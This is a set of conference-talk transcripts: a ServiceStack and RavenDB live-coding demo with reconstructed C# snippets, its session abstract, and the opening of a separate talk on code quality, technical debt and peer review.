fail? Awesome. A few guys. At least you're awake. I'm going to put my container. I'm going to eat the service. Sorry for that. We ever got the ES blown out. Those familiar with Castle Winter would notice that I'm just pulling a lot of stuff in everything that matches and I service will get into this and spun up. So that's quite nice. And it should be able to run now. Anybody else have a laptop without an SSD? This is quite nice page we got from service stack. We can actually see we have operations on drinks. And we can actually look at the bottom and see in case we want to hand this off to someone else and they don't want to use service stack, we can supply them with SSDs and whistles. It's quite easy. 
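Pulling that together, a hedged reconstruction of the drinks service as built: ServiceBase<Drink> with a RavenDB session (assumed to be property-injected by the container), one Run method that returns either a single drink or all of them inside a DrinkResponse, and the route registrations added in the AppHost rather than as attributes on the DTOs. It is this registration that feeds the generated metadata page, XSDs and WSDLs.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using Raven.Client;                   // IDocumentSession
using ServiceStack.ServiceInterface;

public class DrinkResponse { public List<Drink> Drinks { get; set; } }

public class DrinkService : ServiceBase<Drink>   // Drink DTO as sketched earlier
{
    public IDocumentSession Session { get; set; }   // injected by the container (assumed)

    protected override object Run(Drink request)
    {
        var drinks = request.Id != Guid.Empty
            ? Session.Query<Drink>().Where(d => d.Id == request.Id).ToList()  // one drink
            : Session.Query<Drink>().ToList();                                // all drinks

        // Same response shape whether it is one drink or many.
        return new DrinkResponse { Drinks = drinks };
    }
}

// In ApiHost.Configure:
//   Routes.Add<Drink>("/drinks")
//         .Add<Drink>("/drinks/{Id}");
```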
I actually tried it the other night. I don't know why but I did. And then we have the options of the different formances up here. So here you can see pretty much I registered for all works on drinks and drinks ID. And you pretty much have a small example on how am I going to use this. But there's another cool thing about it. What if I try to go for that URL? Awesome. I have an empty database for some odd reason. That's weird. I should have some stuff. Let's just take a peek at this. If anybody spots my mistake please say so. I would guess that I needed to do this to a list because I'm pretty sure that Revenby doesn't like this. Or service stack doesn't like this. We'll see some drinks. Nope. Drinks are gone. My if condition? Is it the other way around? No, I don't want to hit that one. I pretty much want this. And this one. I'm actually doing the regular get. So I just want to get all the drinks. I didn't supply an ID. This was fun. Why did I decide to go for live coding? Ah, no drinks. Oh, I didn't do the app start because I didn't restart my application. I decided to go and clear my complete Revenby database before I went in here. So all the stuff being run from the server, it's pretty much not being run. Let's move this. And we should be able to season drinks, hopefully. Nope. Who ate my drinks? Pretty sure that I added some drinks. Hmm. This is going to be fun showing off drinks when I have none. Let's see. Yeah, created my Revenby. Should be okay. Let's see. Now, isn't it fun looking at people messing up? Give me a break. Yeah, yeah, I know. So let's see if we're lucky this time. We see a button in the database. That's a good start. That's actually quite a good question. Hmm. I'm pretty sure it wasn't this way last night. Let's see. So this is how to completely fail your demo. Anybody remember if you can actually do breakpoints in global ASX? Or did I just change the run code last night? We might have done. I think I know why. So pretty much it should insert some drinks now. Nope. So who killed my code last night? Is this in store? So can anybody see any Revenby errors? What? Clever man. I talked to the Revenby guys the other night and they pretty much convinced me that I should stop using repositories. So this is what happens when you throw away your repositories. So, well spotted. I'm not just nerve-wracking anymore. We might have drinks in a moment. I just killed it. It should be there now. Yep, there it is. Just going to remove that and that. And we are going to get... Yay! Drinks for everyone. So just to make sure that we could actually get a single drink. I'm just going to paste that so it's as easy as that. But that was drinks we were meant to do like a drink card. And that should be fairly easy to do. Since I'm a really lazy bastard, I'm going to take full advantage of using resharper. And I'm going to do a wrist service base and drink card. So that's fun. If you get ticks from me tapping around, just raise your hand. So, I only want to handle on git in the first run. I might want to do some put as well. It's going to be hard to get new cards into the system. Post. This is pretty much what we need to do. As you can see, I don't have to set up all the different types of keywords or verbs. I can just go along as I need to. I could have done it the other way around as well with the eye service and just adding these separate words. There's a lot of options and do whatever fits. If we get a request with an ID, it's always nice doing ID stuff. Go to empty. 
Then I would like to get a drink card. Somehow I have a tendency of missing Raven the Beast off today. It's funny listening to me when I'm silent. Just going to return the drink card. That's fine. We want to just grab all drinks, cards, not crats. Excuse me for my ADD. I can't do misspelled stuff and just doesn't work for me. What the hell am I misspelling? What? Oh, in. I wouldn't think that you would remember that. Card. Select DC. It's nice to have people correcting me. Come on. Be nice. Memorized clone. Why would I do that? So everybody's heavy. We got drink cards as well. It's not going to be much fun if we don't add them. We're just going to grab and say decision store. I'm pretty sure if I've done my fallback to my demo I had in my repo, it would have been failing in the same places. I could say return new HTTP request results. I want to try that. I can pretty much do like this and wrap it inside an HTTP result. But if I wanted to give it a specific HTTP code, I could do that as well. How is it? Status code. And I could say create it. That's some of the options. But the client on the other side would actually accept this and just say, oh, you just send me some extra stuff and I'm just going to grab the drink cards or the single drink card I got. So that's pretty much what we need to run our drink service. And we need to, of course, add the routes as well. So if we go to the card. I wish we pretty much have everything. And as we will see, it should just add another option to our major page in a moment. And all of a sudden we got drink cards as well. And if you look in the output you would see somewhere up here. I think I forgot to add the log manager. But actually when it starts hooking up the services you would get a log entry saying, I just registered this service. So you can actually just see that it does it correctly. And of course we can do stuff like drink cards. And nothing comes, of course. As you see, the profile is running in the upper right corner. It's nice to have. I'm just going to add a logger. So log manager. It tends to be a bit confusing when you have two classes being the same thing. I don't know how many times I've been adding the in-log instead of the actual service stack log manager. And I could say, Nero, do I have an in-log? Yeah, no, that's the wrong one. I knew it in-log factory. It's nice and confusing to have several stuff. Really? No. Stop doing this to me. Did I lose my logging? Yeah, so apparently I forgot to pull my service stack in-log. Oh well, who needs logging anyways? So we could have had logging. So I hope you're okay without logging. And if we wanted to use this great API we just did for drinks, I made a small really, really stupid console app. Somehow everything should be in the terminal these days, so why not do a drink cart manager in the terminal as well? And as you can see, I'm setting up the URL for it. That's quite simple. Of course, we need to know where our API is. And then you just can do a JSON service client. If I go fastly to my slide. Yep, let's see here. So you have all sorts of clients. You have the service client and you have the rest client and the rest async client. Of course, it doesn't really make sense to push the rest clients on the service client, but you can have a service client, rest client, and rest client async for the rest of the stuff. And as I said before, you can actually do the whistle way if you want to do it. We'll just go through this again. The first thing I want to do is of course grab all my drinks. 
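Pulling together the drink card service assembled above, reconstructed the same hedged way: RestServiceBase<DrinkCard> with OnGet for one-or-all cards and OnPost that stores the card and answers 201 Created by wrapping the response in an HttpResult. The DrinkCard and DrinkCardResponse shapes and the /drinkcards route are assumptions standing in for the demo's DTO assembly.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using Raven.Client;
using ServiceStack.Common.Web;         // HttpResult
using ServiceStack.ServiceInterface;

public class DrinkCard
{
    public Guid Id { get; set; }
    public string Name { get; set; }
    public string TimeOfDay { get; set; }        // "Noon", "Evening", ...
    public List<Drink> Drinks { get; set; }
}
public class DrinkCardResponse { public List<DrinkCard> Cards { get; set; } }

public class DrinkCardService : RestServiceBase<DrinkCard>
{
    public IDocumentSession Session { get; set; }   // injected (assumed)

    public override object OnGet(DrinkCard request)
    {
        var cards = request.Id != Guid.Empty
            ? Session.Query<DrinkCard>().Where(c => c.Id == request.Id).ToList()
            : Session.Query<DrinkCard>().ToList();
        return new DrinkCardResponse { Cards = cards };
    }

    public override object OnPost(DrinkCard request)
    {
        Session.Store(request);
        Session.SaveChanges();

        // Wrap the response so a specific status code can ride along with it.
        return new HttpResult(new DrinkCardResponse { Cards = new List<DrinkCard> { request } })
        {
            StatusCode = HttpStatusCode.Created
        };
    }
}

// Routes, again in ApiHost.Configure:
//   Routes.Add<DrinkCard>("/drinkcards").Add<DrinkCard>("/drinkcards/{Id}");
```

On the consuming side, the console app that follows boils down to a JsonServiceClient pointed at the /api base URL, calling Get<DrinkResponse>("/drinks") to fetch the drink list and Post<DrinkCardResponse>("/drinkcards", card) to store the finished card; the same DTO types are shared on both ends, with no generated proxy.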
How much fun is it creating a drink cart if you don't know what the drinks are? So I pretty much grabbed the list and I'll put it later on. So this is just like basic crotch stuff, adding things. And in the end, we're going to do a post to our drink cart service and just say, hey, here's some drink carts. Have fun. Get drunk. And I'm just going to run this and create a short small drink cart. Oh, Jesus Christ. Somehow I managed to remember my fun sizes and so on, but not in a nice way for you. So new cart. It's always nice to have new cart somewhere. And it's the afternoon, right? Or are we going for evening? So we have the list of drinks. We can see that pulled the drinks directly from the service. We might want a white Russian. We want a Long Island IST in Manhattan. And somehow that didn't work. We were supposed to see the right results, but the quick reader might notice that I actually did this wrong because I just returned the drink cart. I didn't wrap it inside my drink cart response. So actually I'm a bitch stuck right now and I need to add my drink cart response, which should be fairly fast to do. Cards. The way service stack handles this when it gets to the response, I say I'm saying like, if you look at this right here, I expected a drink cart response. It will actually try to serialize the response into the drink cart response. But if you try to use it, you would get an awful exception with like, ah, I can't deserialize this. It seems wrong. It's just weird. But it doesn't really just flip upside down and pukes all over the place. It didn't have that many drinks. Yeah, I don't care about the type. How many is annoyed by the automatic typing stuff? And we need to do this as well. Cards, new. Ah, both of them. What am I missing? Ah, yeah. There we are. Yeah, have fun with all the curly braces. Let me just check everything works. As you can see again, it's great not having an SSD. So we actually did put the cart into the stomach of the RavenDB, and we would have gotten this back again, and I could have shown you the JSON. I'm not going to create another one, just, it's just lame doing another one right now. Then we have a lot of extension points for service stack, which is actually quite fun. I talked about the logging. You pretty much set the log factory on it, and how fun wouldn't it be if we could like, do our own custom format? I have prepared a small custom format. If you want your own content type, why don't just do an x-drink card and say it's text. I added the serialize to stream, but I kind of skipped the deserialize, because I don't really care about deserializing these. Yeah. Now you're reusing the types on the server and the file. Yep. Do you have to do that? I would recommend that you reuse your types, because it's just easier to maintain the types. There's no need to have other types, but you could have other types on the client, as long as they serialize to something it matches in the other end. It's possible. You could send raw JSON as well if you want. I just like working with objects. We have a custom serializer here, and the way you could add it was like this. You can see the drink card formator. What you can see is it's going to show up with another drink, another formator in this list as well. It's actually quite nice that it looks at which formators do I have, and here are the options. As you can see in the middle, right here, we have the drink card now. It's quite fancy. We could actually use it right away. 
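The extension points shown here and in the next breath all hang off the AppHost's Configure method. A hedged sketch using the v3-era names (ContentTypeFilters.Register, EndpointHostConfig.EnableFeatures, RequestFilters/ResponseFilters); the x-drinkcard serializer helper and the user-agent tracking are illustrative stand-ins for the demo's code.

```csharp
// Inside ApiHost.Configure(Container container) from the earlier sketch
// (assumes using ServiceStack.ServiceHost; and using ServiceStack.WebHost.Endpoints;).

// 1) Custom format: register a content type with its stream serializer
//    (the demo skips the deserializer, hence the null).
ContentTypeFilters.Register("application/x-drinkcard",
    (requestContext, dto, outputStream) => DrinkCardFormatter.WriteTo(dto, outputStream),  // hypothetical helper
    null);

// 2) Trim built-in formats by subtraction: everything except, say, CSV.
SetConfig(new EndpointHostConfig
{
    EnableFeatures = Feature.All.Remove(Feature.Csv)
});

// 3) Hooks on every request/response, handy for statistics.
RequestFilters.Add((httpReq, httpRes, requestDto) =>
{
    var userAgent = httpReq.Headers["User-Agent"];
    // push it into whatever statistics store you use
});
ResponseFilters.Add((httpReq, httpRes, responseDto) =>
{
    // same idea on the way out
});
```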
If you want to see it drink card formatted in a really weird way. Yes, I accepted. This is our custom formatting. It's really that easy. Just go along, do your own business. That was one of the fun parts doing. What if I wanted to remove some stuff? I could actually do that as well. Let's see. Pretty sure I'm grabbing the wrong thing here. Yes, I thought so. Wrong place. Enable features. They were so nice that they actually added features all. When you want to remove stuff, you go features all, and you pretty much just say that you want to remove a single thing. That could be like whatever. We could remove the XML. If you're really quick, you could notice that it supports protocol buffers as well. How many have ever heard about protocol buffers? Nice. It's a way, as far as I remember, it's optimizing the payload you send over the wire. It's awesome if you need really, really small segments or a lot of compressed data. Now we should see XML disappearing. Hopefully. Maybe. Come on. Faster. Magic. Yay. That wasn't a good demo. Ah, CSV. Not XML. Notice if CSV was gone. Ah, this, yeah. I don't know who uses CSV for serializing. It seems weird. We could do request filtering as well if we wanted to do statistics on our website. We have the option of going to request filters and say just saying add, and we could do requests, response. And then we just go along and do whatever we wanted to do, because we have access directly to the, we could like track the user agent. We just grab it right off every request and we can do it the same on the response as well. So there's a lot of hook points and you can actually just do whatever you like. So it's nice that it's just plain simple when it comes out of the box, but if you really want to do wicked stuff, you could just go do it. I don't know if wicked is the right term to use, but that's how it is right now. And then I have some more fantastic slides. So we talked about the clients and you can pretty much switch to another client if you just wanted to serialize the other way. You don't have to do anything on the server. If I wanted to change my JSON service client, I could just do it and say, I want the GSV service client. So that's pretty nice that I can just switch to whatever client I like. I think it's pretty handy from time to time. And then it's a freaking Swiss Army knife. And why is it a Swiss Army knife? Well, we have a lot of options. Hmm, I think that's a bit like long list of SQL service supported, but it's really, really nice that you can just grab another NuGet package and you have it in the box. So it supports all these. And if you want authentication besides the built-in ones, the built-in ones are, as far as I remember, basic and some other authorization stuff. And they have Twitter and Facebook authentication. Why would I need that on my web services? I don't get it. If somebody knows why, please come and tell me afterwards. And I think it was Monday or last week, they added the N-hybernate to the authentication plan. And if you want to do caching in the box comes, of course, the RITIS. And it has memory client, file client, file and XML disk written client, whoever wants to use disk cache. Or you can just grab Azure or memcached. And of course, protocol officers support it. It was in the list of options, but it's an add-on you grab on later. And of course, it supports logging. My favorite is N-Log, but if you want to run Log for NET, and yes, it does exist in a strong signed and a non-strong signed for those who cares. 
And you have ELMAH and the EventLog, of course. Yay, you can sleep in it and you can eat it. And of course, as I said, if you have the need for speed, this is going to be awesome. If we take a short look, we see Json.NET here. He actually did a whole performance release, but apparently he still didn't beat it. And way over here we have ServiceStack.Text. And if you look at it, going from JayRock or the JavaScriptSerializer to this is going to have a really, really huge impact on your serialization. And imagine if they can cut even 25% more off it. That's going to be awesome. And it's cross-platform. There were a few Linux guys, or Mac, or whatever you're doing. It supports ASP.NET and HTTP listener-based hosting. And as you can see, if you have a really, really old server, that's not a problem. I was running the demos on IIS Express, and in my production code I actually have a Windows service hosting my API. So there are a lot of options if you need them. And that's all the, I was about to say weird Linux and OS X stuff, but that might sound wrong. If anybody knows about this stuff, I'm pretty sure you would nod and say: this is okay, this works, this is what we're doing. And there's a small surprise in the end, because how many would like to see Service Stack running on an iOS device? They actually did a demo where they ran it on MonoTouch. I don't know why on Earth I would host web services inside an iOS app, but apparently somebody liked it. So we can fly. Yay! Where can you find more stuff about this? If you go to the source, you can grab whatever you need. It's right there on GitHub. And you can find a lot of help in the wiki pages. And you have a docs section as well. It's a bit split; I think the wiki pages are more up to date than the docs pages, and the docs pages are mostly about extension points or other plugins they have. And then we start wondering: would we actually use Service Stack in a production environment? As I've already said, I'm running it as a Windows service, and it's going to be quite good. We're going to do a production release by the end of this month. And it's not like some kid in Texas just sitting alone, drinking Coke, having a pizza and doing some random stuff. It's actually quite old. As you can see, the first commit was done in 2008. So it's not a new product. It's actually quite old. The first version didn't look like this at all. And in case you didn't catch it yet, yes, Demis Bellot works for Stack Exchange. I'm pretty sure he's a solid guy for this stuff. If you don't trust him, I'm willing to send him an email saying people don't trust him. And it's quite well maintained. Actually, when I wrote my code last week, I was running 3.7.9 or something like that. And I did the "you're about to fail, speaker" thing, because I updated my assemblies this morning. And as you can see, there are a lot of commits coming in, and it's really nice. There's always a new commit. And that was pretty much everything I have to tell you today. If anybody has questions, I'll try to answer them the best I can. Also, I'll let you leave early for your flight or your train or your car or drinks or whatever you like to do. And I would like to give a shout out to the Code 52 guys. You should check out the projects. It's a fun place. A lot of new stuff going on. Anybody have any questions? None? It does support all weird kinds of authentication if you want to dig into that at some point. You have a question? Awesome. Does it handle SSL yet or no? The question is whether it handles SSL yet.
It was actually one of the first things I started looking at, and it turns out to be a bit weird. It's not an in-the-box story, because you need to do some registration yourself; it isn't really Service Stack that handles the SSL part. You run a couple of wicked, nasty command-line tools and, whoop, you have SSL support. So it is supported, you can do it, but it's not something Service Stack itself handles. Anybody else? I think we'll say that's it. Thank you for coming. It's quite nice to see so many people showing up even though it's the last session of the day. Thank you very much for coming. Thank you.
|
Getting tired of adding services via “Add Service Reference”? Annoyed by configuration that is hidden away and easy to forget? Wish you could be a little more in control of your service channels? Now there is an option that solves it all: enter Service Stack, which gives you the power back without setting you back to the days of *.asmx. With Service Stack you control what flows through your application, e.g. no more boxing into an ObservableCollection just to push data over the web. This session will show you how easy it can be to regain control of your networking layer, and how little code it actually requires. With Service Stack you don’t have to spend much time worrying about supporting other serializers; the most frequently used ones are in the box. Last but not least, you’ll see how easy RESTful services can be.
|
10.5446/50994 (DOI)
|
All right. Let's get started. Welcome to the session on caring about code quality. My name is Venkat Subramaniam. We're going to talk about something that we as programmers are very passionate about. If you have attended some of my previous talks, I have to apologize. This one has no code at all. The other one's had no slide at all. So sorry for that. But I hope we can still have a good conversation and talk about quite a few things here in terms of code quality. So best time to ask a question or make a comment is when you have it. Please do ask questions, make comments. I definitely love to hear from you what you have in mind. So don't hesitate. It's not an interruption at all if you want to just step in and talk. Raise your hand. But if I don't respond to you, that usually means that I'm not paying attention to where you are. But just start speaking something or make a noise and as soon as you draw my attention, I'll yield to you and respond to your question or comment. So let's get started. First question, of course, always, I'm a why kind of a guy. I always ask why. Why should I do it? So my first question, of course, in this context is why do I care about code quality? Why should I care about quality of code when my intent is to write code and get code working? And the reason simply is this. You cannot, we cannot be agile if our code sucks. Now imagine for a minute, you are on a project and your company says we are agile and the customers are like really what does that mean? And your company says that means you guys tell us what you like and we will respond to your change. And the customers are like that's kind of nice. Can you change these things? And your company says sure we are agile, why not? And you're sitting in that meeting and as the guys are talking about it, you realize to make that change that they are talking about, you got to touch that code, you know, the one I'm talking about. And the code that you touched last time and you could not go home for the weekend. And now you're going to convince them this is not a good change to have, right? So in other words, if you cannot really have a good quality of code, it's extremely hard to be agile where agile is to respond to change based on feedback we receive. And that's one of the reasons why we should care about code quality. So what is quality of code? Why should we really care about it in that regard? And to me, code quality is really boiling down to this wonderful quote. Programs must be written for people to read and only incidentally for machines to execute. We spend so much effort writing code. We don't often think about reading code, but programs are for human beings to be able to understand. And what do we normally do when we speak to each other? We communicate. And there are different ways to communicate. One way is verbally we can communicate with each other, but your code is a way that you communicate with your fellow developers in the company. And so it's important for them to be able to understand the code and to be able to maintain the code that becomes extremely important and useful for us to think about. So from the point of view of that, it's important for programs to be written by people so it can be read by people more than executed by the compiler or the computer itself. That's very important. Now, having said that, one of the reasons why we have to make sure the code is of good quality is, unfortunately, software is never written once. 
If somebody tells you they designed the software and wrote it and they never changed it after that, they are telling you the project got canceled, right? Because any useful software has to evolve has to change. And the amount of change a software has to go through depends on the number of features we are trying to support. And more that is, it's got to change. And as a result, we have to support this change. That's very important. And one of the problems with software is the cost of fixing a defect increases the more time goes between writing the code and finding the problem. If you write code and within seconds you say, darn it, that's stupid, I shouldn't do it, duh. And then you go back and fix it, that only cost a little bit of money. But if you find it next day and fix it, that cost a little bit more money. What if you find the problem in two months after you wrote the code? If you are like me, after two weeks, I can't even recognize my own code. I look at this and say, did I write this? So it takes more time for you to gain the context on the code and go back to fix it and it becomes more expensive. And the worst thing is you got to look at a code written a few years ago by somebody else who no longer works in the company. That's the worst kind of job to be in. And you are really looking at this code and trying to understand it becomes very expensive. So how can we reduce the cost of developing software and handling defects? And Bohm talks about this in one of the good papers and they say that finding and fixing problems in production code is 100 times more expensive than finding and fixing problems during development. So we want to be able to get to this really quickly during development and not really wait until production time for this to find. And it says 40 to 50% of effort on projects is avoidable rework. So we do so much that can be avoided and we don't have to waste our money and time doing this. And they talk about 80% of avoidable rework comes from 20% of defects and they talk about the 80% of defects comes from 20% of modules. So this is really encouraging news because we can contain the area and really solve the problem. And it says 90% of downtime comes from mostly 10% of defects which are really critical on projects. They go on to say one of the best ways to really improve software and reduce cost is to have peer reviews because peer reviews catch 60% of defects. And I cannot overemphasize this. This has been around for a long time but one of the practices that is not as much used in our industry because most of us don't like to do this for various reasons. But if there is a way we can have code reviews and peer reviews on projects, it can reduce the cost. I will come back and talk about this definitely more because this is such an important topic to spend time on. But it's not just a code review and I am very adamant about this. The worst code review you can have is where you have architects and senior developers reviewing code that other people write. There is a name for this. It's called the priesthood based code review where you bring in people with beard and they think they are great programmers and they sit there and say how your code sucks. This is absolutely useless. So what you really want is a perspective based peer review. The people reviewing the code should be the people writing the code itself. 
Not some architect somewhere who doesn't write code anymore but is really important for them to review the code somehow and tell you whether your code sucks or can be better. So it's important for a peer based review. Like I said I will come back and talk about this more later on. But then they go on to say that discipline to personal practices can reduce defect introduction rate by 75%. Now this sentence is loaded with several important things here. The first important here is discipline. This is one of the most difficult things for us in developing software is to really have discipline. It's easy for us to acquire a lot of practices. One of the reasons I cringe the word agile development today is if you look at most companies and look at what are they spending their time and money on. They want agile development. They want training related to agile development. You go to them and they say can we have scrum certification please. Can we have stand up meeting please. Why? Because standing up is so easy especially if you can lean on a chair. Right. I don't want stand up meetings in my team. Who cares about stand up meetings. Tell me what you're going to do to really effect change in building software. And guess what. That takes effort. That takes discipline. So most companies do what I call as agile by convenience. So they want to pick and choose real practices that are so darn simple and easy to use so they can just apply those and the real hard stuff. Let's not worry about it. That's not for us. Right. So I don't want agile by convenience. I want agile by dedication and discipline. Let's do the real hard stuff and make the software better and serve the needs of the customers. So discipline is extremely important in this regard. And personal discipline on projects is very important. And that means you don't say I would do all this if only my company allowed me to do that is utter nonsense. If we believe in doing things that's at a personal level then we propagate that to the team and make everybody else follow that. So personal discipline is extremely important. And if we can use some of the personal discipline practices it doesn't eliminate defect. It eliminates the introduction of defect in software which is a lot better than removing defects because you don't want to put in and then remove it. So that is one thing to think about. The other thing they talk about is it costs 50% more for source instruction to develop high dependability software products. In other words if you want to build the quality software it is going to cost you money. It is not free. It is not going to be something you can just kind of do along the way. It is going to take money and effort. Now to really expand on this one of the companies which is my client they called me up a few years ago back in 2007 timeframe and they said we have problems with quality. Could you please come and do some courses related to quality and improve quality on our product. I went and offered the scores in one of their locations and two weeks later I was going to go to their another location and teach the same course and then go and teach the same course in several of their locations. So when I finished the first scores at one of their locations one of the developers came to me and said hey Venkat we have known you for several years. You come here and give us all these nice talks. We get really excited about what we hear. We talk about the course. 
We talk about what you said for about two weeks and then afterwards it is business as usual. So tell us why this time it is different. And I swiftly answered him saying that your problem not mine. I just came here to teach and I kind of walked away. Two weeks later I went to their another location. The guy who hired me was there. He said oh by the way I heard that there was a question posed to you. I said here was the question they asked me and he said what was your answer. I said that I said it's your problem not mine. And he said well okay do you have the same answer now or do you have a different answer. I said I have a different answer now because that was a spontaneous answer but I've had two weeks to think about it. He said what is your answer. And I said he is absolutely correct. My time and effort here is completely wasted and your money is completely wasted. If you guys going to just listen and walk away. He said okay what should I do. I said the first thing you do is for every software project in your company where quality is important. Find one person in the team not a manager but a technical person and make that person the champion on the project for quality. That champion on the team is responsible to first define how he or she is going to make the team improve quality in three months in six months and nine months and in a year. And this becomes the responsibility of this quality champion in your team to do this. This was in 2007 by the way and it's been about five years and that's exactly what they have done. He's identified quality champions on teams and they have done very dedicated effort in building quality software in measurable levels. So in other words if you are serious about quality don't talk about it. Do it. Have somebody whose responsibility is to improve quality and they have to really work on it and show the results in a three month period, six months period, nine months period and a year and say here is how we have improved it and here is the plan for the next three months moving forward. So it is really something we have to really work towards to improving the quality of software. But still the evidence is overwhelmingly clear. But one thing I noticed I'm sure you share the feeling with me is that companies never have time to do it. But they always have time to redo it. This is kind of funny isn't it? Because you go to the company and say hey we need to do this the right way. Can I do it? No we don't have time for it. Then we create a big mess as programmers and the company comes running behind us and saying could you please fix it now? So they never have the money and the time to do it but they always somehow have the time and money to redo it and that is kind of a reactive behavior that we have imbibed in our culture as organizations developing software we need to break out of that cycle very clearly. That's very important. So one of the things to think about is to pay the technical debt. So if you are on an agile project and if you are scheduling your project iteration or a sprint I will first ask you how much time are you dedicating in every sprint or every iteration to really address the technical debt. Do you know what your technical debt is? That is something to think about. So if you don't know what your technical debt is or even if you do know what your technical debt is but if you're not giving enough time to really solve the technical debt this is eventually going to blow up because the way the technical debt works is very similar to financial debt. 
So I have a credit card. I go around charge this credit card along the way and as I keep charging the credit card at the end of the month the credit card company sends me a bill. I'm sure nobody here likes to receive that bill right and the bill arrives in the mail and you look at that and say it says you owe this money and I tell myself you know what I'm getting the salary but I've got so many useful things to buy. Why would I want to waste that money paying for this stupid credit card? So I'm going to send a minimum balance and continue to spend and a year goes by and I've reached my credit limit. What does the bank do? Remember the bank cares about me right? So the bank sends me a letter saying dear valued customer you exceeded the credit limit so we have extended it. So they increase it by tenfold because the bank cares about me so much they never want me to get in trouble they want me to get into real trouble. That's part of the financial world right where things are. So I keep spending more and spending more and spending more and one day I realize the money I owe to the credit card company is several orders more than my salary per year. The only options I can think of is to grow a beer change my name and move to a foreign country. I have no such intention during this trip just to be clear right? And the point really is you have to have the discipline to manage your budget and pay things along the way and really a technical debt is exactly the same and if we don't pay technical debt eventually the project will have to declare bankruptcy. Now I'll tell you about something that I learned the hard way. I was in college and I'm sure you know all of you going through college did exactly the same thing right? Please do say yes otherwise I feel bad about it. So when I lived in the college I used to rent apartments and in my apartment I would never clean my apartment. We would completely trash the place and about six months after that it would become unlivable but it was very easy we'll just move to another apartment and I thought this was life right? I mean when you're in college you know kind of what you know right? And this was like awesome you could trash the place and you could move right? And then I went on to take up a first job and when I went to take the first job is when I realized it doesn't work like the college days because there's a code base that you inherit and there's been somebody else who have moved and you are the cleaning crew at this point. What a shock I had the first time and when you leave a project and go there's a code you inherit and you got to maintain and I started learning some discipline along the way like things like mom and dad were trying so hard to teach right? You have to really have a discipline in what you do same with technical debt. So we have to take the time to pay the technical debt along the way so measure your technical debt and plan for removing them along the way and don't lead it to a bankruptcy situation. But what is really quality though? Quality is a measure of how software is designed and implemented but more so from the point of view of how effectively it can change and so a quality is extremely subjective and so you cannot just say here is an absolute definition of quality there's no litmus test. You cannot take a stick and insert into the code pull it out and say well that's red in color so that sucks. You can't really have such measure of quality it's very subjective we got to kind of evaluate it. 
But measuring quality is very hard how do you really find metrics? There are some very bad metrics the world has created. One of them is the lines of code. A very bad idea right? Because does it mean it's better if you have more lines of code or does it mean it's better if you have fewer lines of code? Well neither one of them is true right? Because it could be bloated code that's totally unnecessary on one hand or a very terse and cryptic code which is hard to maintain on the other hand so we cannot simply use the lines of code as a metric. Now it's very highly subjective alright but we got to have a way to measure something and it's very qualitative rather than being quantitative. So the first question I would ask is is the code readable? Now here comes the problem have you ever met somebody who says my code is not readable? Maybe a few people do but one of the biggest problems I see is when programmers think they create readable code nothing is more dangerous than that. So I have a challenge for you if you want to create readable code I think there is only one way to do that. The way to create readable code is to read it. There is absolutely no other way to do it. So if somebody writes a piece of code they have no business claiming it's readable unless somebody actually has read it and when they start reading it they throw a fit. They complain about it and when things calm down maybe you have a code that's readable. So you can never claim a code is readable unless somebody else who has other than the person who has written this has actually read it and it's got to be a couple of people to read it. So the best way to create readable code is to read it and what that means is never leave programmers in isolation. The worst kind of programmers are the programmers who write code and think they write excellent code those are the most dangerous people because what they do is they build a fort around them and say I'm cool guy I write excellent code. Hey when was the last time anybody looked at your code? Well the compiler did right so that's not enough as any human being read your code and survive the process right and if you write the code and give it to other people and to a great extent I would say good programmers are shameless they would give the code and say tell me how my code sucks. 
Now let me say something very quickly I'll admit to you I can never write good quality code I've given up on that I could never do it I tried really hard to write good code and I could never do it but then I realized something that I'm extremely good in finding fault with other people's code and you come to me and say Venkat write good code I'm like I can't do it but you show me a code I'll tell you a thousand things a thousand ways your code sucks so I realized I could use this to my advantage rather than pretending that I can write good code I write crappy code really quickly I give it to him to code review while I take your code and review at the end of the day we all have a better quality of code how about that so by having a quick code review we can actually improve the code rather than trying to aspire to this kind of unreachable goal pretending to write a great quality code because again that's very subjective as it turns out so why try so hard to do that is the code really verbose is it on the other hand too cryptic or the variable names and method names name appropriately that is something we have to think about is it a simple code that works that's that's really hard to answer without without being you know putting a context together does the code have tests in it what is the coverage of the test these are some of the questions we could ask so there are some ways we can improve the quality of code along the way so I'm going to talk about two ways to improve code one you as an individual and then you along with your team as a team collectively what can you do there are certain practices you can do for yourself and there are certain practices that you would need the team to do and we'll talk about both the first thing I would recommend is start early because it's impossible to really improve the quality of code all of a sudden towards the end of the project and say somehow we'll do a iteration where it'll improve quality that's a fallacy right that doesn't work that way so you got to start really early don't compromise on quality along the way have something that you maintain along the way and and if you have to really look at something bring the team together and talk about it hey can we improve this we don't want to just take a shortcut schedule time to lower your technical debt like I said earlier in your schedule linear iteration in your sprint you want to schedule a certain amount of time that you want to do the cleaning off the technical debt make it work and make it better I'm a huge fan of this mantra I'm not about getting perfection in the first run make it work first then immediately make it better that's where the red green refactor comes in also in testament development but this requires monitoring but more important it requires a change in behavior we cannot improve what we do without changing how we do things if we don't want to do anything different Einstein said the definition of insanity is to do the same thing over and over and somehow expect a better result the next time so if you want a different outcome you have to change the way you do things and reevaluate it so it requires a change in behavior and be willing to help and be willing to be helped and I believe in collaborative effort a great deal I want to be helped by other people in my team I have to be a bit shameless about it it's okay to say hey how can I improve the worst thing that can happen is that I would be a better person than I was yesterday and to be able to help also is to go to somebody and say 
how could I help you with this right without really hurting their feelings or emotions we can certainly do that so device lightweight non bureaucratic measures to do this so I'm going to talk a little bit about individual efforts what can you do as a person I don't believe in saying I would do all this if only my company were to do this right I don't think that's reasonable we got to do certain things ourselves and then expect the team to do the rest of the things for what first what can you do first is care about the design that you create because your design lives in your code maintainability of that is influenced are you coming with good variable names for your classes for your methods for your fields are you coming up with good names for these things and honestly I don't think I can come up with good names myself I tried really hard I would think about deeply and I would create a variable name and the minute I give the code for code review my fellow programmer says hmm why would you name it like that that's like what do you want it to be named and then you realize the context of where they are coming from and then you converge on a better name so it's okay to evolve the name but do that quickly so that you have a better name by the way long names doesn't mean it's better sometimes long names are as evil as short names but it's important to have meaningful names and you know you may say wait a minute isn't that kind of obvious well yes it is but how many times do we do that how many times do we see work on projects where there are single letter variables we all know we cannot create single letter variables but we all see single letter variables I was teaching a course in Virginia and one of the guys came to me and said hey you're talking about coding standards how how dare you do that we are a huge software company we write the software billions of dollars worth and you think you have to come and talk to us about single letter variables I kind of defended my position I said well sure if you guys do that already that's great I'm very happy for you in case you're not 